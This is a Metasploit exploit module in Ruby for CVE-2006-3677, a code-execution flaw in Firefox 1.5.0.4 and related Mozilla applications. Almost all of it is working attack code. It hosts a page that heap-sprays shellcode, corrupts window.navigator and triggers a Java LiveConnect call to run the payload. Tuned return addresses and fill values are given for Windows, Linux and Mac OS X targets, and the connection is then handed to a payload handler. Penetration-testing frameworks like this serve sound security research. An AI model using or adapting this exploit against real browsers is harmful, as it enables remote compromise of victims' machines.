Path: blob/master/modules/exploits/multi/browser/mozilla_navigatorjava.rb
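##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit for CVE-2006-3677 (MFSA 2006-45): assigning a number to
# window.navigator and then reaching into the Java LiveConnect bridge
# (java.lang.reflect.Runtime.newInstance) lets the page redirect execution
# into attacker-controlled heap memory.
#
# Delivery: the module hosts a single HTML page; every request gets a freshly
# encoded payload (see on_request_uri) embedded in a heap spray built in
# generate_html.  The spray saturates the browser heap with the per-target
# 'Fill' pattern and the shellcode, then sets window.navigator to the
# per-target 'Ret' value so the subsequent Java call lands inside the spray.
#
# Operational caveats a user should know:
#   * The spray builds 36 strings of 4 x 0x100000 characters (~144M UTF-16
#     code units, several hundred MB of victim RAM).  Low-memory targets may
#     become unresponsive or be killed before the corrupted call fires.
#   * This is memory corruption in the renderer; a missed Ret/Fill pairing
#     crashes the browser rather than failing quietly.  The 'Notes' block
#     below leaves reliability/stability/side-effects UNKNOWN because this
#     module has not been re-characterised.
#   * The Java plugin must be present and enabled (the JS checks
#     navigator.javaEnabled() before spraying); otherwise the reflective call
#     raises and is swallowed by the try/catch, and nothing happens.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Historic BrowserAutopwn fingerprint, kept for reference; the module is no
  # longer registered with autopwn.
  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #   :ua_name    => HttpClients::FF,
  #   :ua_minver  => "1.5.0",
  #   :ua_maxver  => "1.5.1",
  #   :javascript => true,
  #   :rank       => NormalRanking, # reliable memory corruption
  #   :vuln_test  => %Q|
  #     is_vuln = false;
  #     if (navigator.javaEnabled()){
  #       is_vuln = true;
  #     }
  #   |,
  # })

  # Module metadata.  Each target pairs a 'Ret' (the value written into
  # window.navigator, halved in the JS) with a 'Fill' (the 16-bit unit the
  # heap is sprayed with).  The two are tuned together per build/platform;
  # change one only alongside the other.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
          requires the Java plugin to be installed.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm'],
        'References' => [
          ['CVE', '2006-3677'],
          ['OSVDB', '27559'],
          ['BID', '19192'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
        ],
        # 512 bytes is what fits in each sprayed slot alongside the fill;
        # no bad chars because the payload is delivered via unescape(%uXXXX).
        'Payload' => {
          'Space' => 512,
          'BadChars' => "",
        },
        'Platform' => %w{win linux osx},
        'Targets' => [
          [
            'Firefox 1.5.0.4 Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x08000800,
              'Fill' => "%u0800",
            }
          ],
          [
            'Firefox 1.5.0.4 Linux x86',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
              # Negative so the literal interpolated into the JS is a signed
              # 32-bit value; 0xa8000000 would overflow a JS int literal.
              'Ret' => -0x58000000,
              'Fill' => "%ua8a8",
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              'Ret' => 0x0c000000,
              'Fill' => "%u0c0c",
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
              'Ret' => 0x1c000000,
              'Fill' => "%u1c1c",
            }
          ],
        ],
        'DisclosureDate' => '2006-07-25',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP server callback: serves the exploit page to a connecting browser.
  #
  # @param cli     [Rex::Proto::Http::Client-side connection] the victim connection
  # @param request [Rex::Proto::Http::Request] the incoming request (unused; any URI is served)
  # @return [void]
  #
  # A fresh payload is encoded for every request so each victim gets its own
  # instance.  If regeneration fails (no payload for the selected target), the
  # request is dropped without a response rather than serving a broken page.
  def on_request_uri(cli, request)
    payload_obj = regenerate_payload(cli)
    return unless payload_obj

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(payload_obj), { 'Content-Type' => 'text/html' })

    # Hand the connection to the payload handler so a stager can come back on it.
    handler(cli)
  end

  # Builds the exploit page for the selected target.
  #
  # @param payload [Msf::EncodedPayload] payload whose .encoded bytes are embedded
  # @return [String] a complete HTML document
  #
  # The shellcode is emitted as a %uXXXX escape string in the target
  # architecture's byte order (Rex::Arch.endian), so it survives unescape()
  # unchanged.  The page only sprays and triggers when Java is actually
  # enabled; navigator.javaEnabled() is called, not merely tested for
  # existence, because the method itself is always present.
  def generate_html(payload)
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    fill = target['Fill']
    ret = target['Ret']

    %Q|
<html><head>
<script>
function Exploit() {
  if (window.navigator.javaEnabled()) {
    var shellcode = unescape("#{enc_code}");
    var b = unescape("#{fill}");
    while (b.length <= 0x400000) b+=b;

    var c = new Array();
    for (var i =0; i<36; i++) {
      c[i] =
        b.substring(0, 0x100000 - shellcode.length) + shellcode +
        b.substring(0, 0x100000 - shellcode.length) + shellcode +
        b.substring(0, 0x100000 - shellcode.length) + shellcode +
        b.substring(0, 0x100000 - shellcode.length) + shellcode;
    }

    window.navigator = (#{ret} / 2);
    try {
      java.lang.reflect.Runtime.newInstance(
        java.lang.Class.forName("java.lang.Runtime"), 0
      );
    }catch(e){

    }
  }
}
</script>
</head><body onload='Exploit()'>Please wait...</body></html>
|
  end
end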